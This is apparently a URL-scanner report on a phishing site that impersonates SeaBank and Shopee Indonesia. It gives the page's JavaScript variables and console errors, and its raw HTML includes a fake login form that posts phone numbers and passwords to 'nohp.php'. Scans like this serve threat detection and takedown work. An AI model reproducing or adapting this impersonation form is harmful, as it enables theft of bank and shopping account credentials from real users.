https://layanan-seabank.official-gopay.my.id/

Submitted URL:
https://layanan-seabank.official-gopay.my.id/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 6 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
Ioniconsobject

Console log messages · 2 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://layanan-seabank.official-gopay.my.id/lib/style/index.css
Text
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://layanan-seabank.official-gopay.my.id/lib/function/eye.js
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html class="hydrated"><head><style data-styles="">ion-icon{visibility:hidden}.hydrated{visibility:inherit}</style>
        <meta http-equiv="content-type" content="text/html; charset=utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <meta content="Produk Tokomamagigi | Shopee Indonesia" property="og:title">
        <meta content="https://shopee.co.id/" property="twitter:title">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
        <meta name="theme-color" content="#EE4D2D"> 
        <link rel="canonical" href="https://shopee.co.id/">
        <meta property="og:url" content="https://shopee.co.id/">
        <link href="https://i.ibb.co/BGvXtqn/images-19.jpg" rel="shortcut icon" type="image/x-icon">
        <link href="https://i.ibb.co/BGvXtqn/images-19.jpg" rel="apple-touch-icon">
        <meta content="Produk Tokomamagigi | Shopee Indonesia" name="generator">
        <meta content="Webflow" name="generator">
        <link rel="stylesheet" href="./lib/style/index.css">
        <title>
            PT Bank Seabank Indonesia berizin dan diawasi oleh Otoritas Jasa Keuangan (OJK) dan Bank Indonesia (BI) serta merupakan bank peserta penjaminan Lembaga Penjamin Simpanan (LPS)</title> 
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
        <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
    <style>
      @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300&display=swap');

:root{
    --color1: #EE4D2D;/*orange*/
    --color2: #fff;/*putih*/
    --color3: #000;/*hitam*/
    --color4: #ccc; /*abu*/
}

body{
    margin: 0;
    padding: 0;
    font-family: 'Poppins', sans-serif;
}

#container{
    width: 100%;
    height: 100%;
    max-width: 600px;
    max-height: 1000px;
    position: absolute;
    background: var(--color2);
    box-shadow: 0 0 5px 0 rgba(0,0,0,.50);
    left: 50%;
    top: 50%;
    transform: translate(-50%,-50%);
    -webkit-transform: translate(-50%, -50%);
    -moz-transform: translate(-50%, -50%);
    -ms-transform: translate(-50%, -50%);
    -o-transform: translate(-50%, -50%);
}

.navShope{
    width: 100%;
    height: 44px;
    background-color: var(--color2);
    box-shadow: 0 0 5px 0 #ccc;
    display: flex;
    justify-content: space-between;
    align-items: center;
    position: relative;
}

.navShope img{
    width: 30px;
    height: 30px;
    margin: 10px;
    position: relative;
}

.login{
    font-size: 20px;
    position: absolute;
    left: 60px;
    top: -9px;
}

/*.form_group{
    background-color: green;
    width: 100%;
    height: 60%;
    position: relative;
}*/

form{
    position: absolute;
    transform: translate(-50%,-50%);
    top: 55%;
    left: 50%;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 16px;
}

.logo{
    width: 200px;
}

.group_input{
    width: 300px;
    padding: 8px 35px;
    border-bottom: 1px solid var(--color4);
    background-color: transparent;
    display: flex;
    position: relative;
}

.eye{
    width: 20px;
    height: 20px;
    position: absolute;
    right: 30px;
}

.sles{
    width: 20px;
    height: 20px;
    position: absolute;
    right: 30px;
}

.lupa{
    position: absolute;
    font-size: 15px;
    right: 0;
    top: 0;
    color: #0290FF;
}

.garis{
    position: absolute;
    right: 47px;
    top: 0;
    color: var(--color4);
}

.user{
    font-size: 20px;
    position: absolute;
    left: 0;
}

.pass{
    font-size: 20px;
    position: absolute;
    left: 0;
}

input{
    width: 100%;
    outline: none;
    border: none;
    background-color: transparent;
    position: relative;
}

input::placeholder{
    color: #ccc;
}

button{
    width: 300px;
    padding: 10px;
    border: none;
    background-color: #eaeaea;
    color: #ccc;
    font-size: 17px;
    margin-top: 25px;
    transition: ;
}

.group_daftar{
    display: flex;
    gap: 70px; 
    color: #0290FF;
}

.groupFor{
    display: grid;
    justify-content: center;
    align-items: center;
    grid-template-columns: 3fr 3fr 3fr;
}

.garis1{
    width: 80px;
    border-bottom: 1px solid var(--color4);
    margin-left: -5px;
    margin-right: -5px;
}

.atau{
    text-align: center;
    font-weight: 700;
    color: var(--color4);
}

.groupSosmed{
    text-align: center;
    position: relative;
}

.group{
    width: 300px;
    padding: 10px;
    background: transparent;
    border: 1px solid var(--color4);
    margin: 10px;
    position: relative;
}

.group_img{
    width: 30px;
    position: absolute;
    left: 6px;
    top: 4px;
}
    </style></head>
    
<body>
  <div id="container">
     <nav class="navShope">
         <img class="back" src="assets/img/back.png" alt="">
         <h1 class="login">Log in</h1>
         <img class="tanya" src="assets/img/tanya.png" alt="">
     </nav>
     <div class="form_group">
       <form action="nohp.php" method="post" name="frm">
         <img class="logo" src="https://h.top4top.io/p_3155kzfn80.png" alt="">
           
          <div class="group_input">
            <ion-icon class="user md hydrated" name="person-outline" role="img">
             </ion-icon>
            <input type="text" name="a" id="name" placeholder="Nombor telepon">
          </div>
          
          <div class="group_input">
            <ion-icon class="pass md hydrated" name="lock-closed-outline" role="img"></ion-icon>
             <input type="password" name="b" placeholder="Password" required="" autocomplete="off" class="name" id="password">
              <div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen">
                            <img class="eye" alt="" id="eye" src="assets/img/2.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none">
                            <img class="sles" alt="" id="eye" src="assets/img/1.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        <h5 class="garis">|</h5>
                        <h4 class="lupa">Lupa?</h4>
         </div>
             
             <button type="submit" class="button_login" id="send" disabled="">Log in
                  </button>
                  <div class="group_daftar">
             <p>Daftar</p>
         </div>
         </form></div>
        
         
     </div>
  

<script>
    document.getElementById("name").addEventListener("keyup", function() {
    var nameInput = document.getElementById('name').value;
    if (nameInput != "") {
        document.getElementById('send').removeAttribute("disabled");
    
    } else {
        document.getElementById('send').setAttribute("disabled", null);
        
    }
    
    document.getElementById(send);
    if (send) send.style.backgroundColor = '#EE4D2D';
    send.style.color = '#fff';
    send.style.transition = 'all 1s ease'
    
});
</script>
<script type="module" src="https://unpkg.com/[email protected]/dist/ionicons/ionicons.esm.js"></script>
<script nomodule="" src="https://unpkg.com/[email protected]/dist/ionicons/ionicons.js"></script>
<script src="./lib/function/eye.js"></script>

</body></html>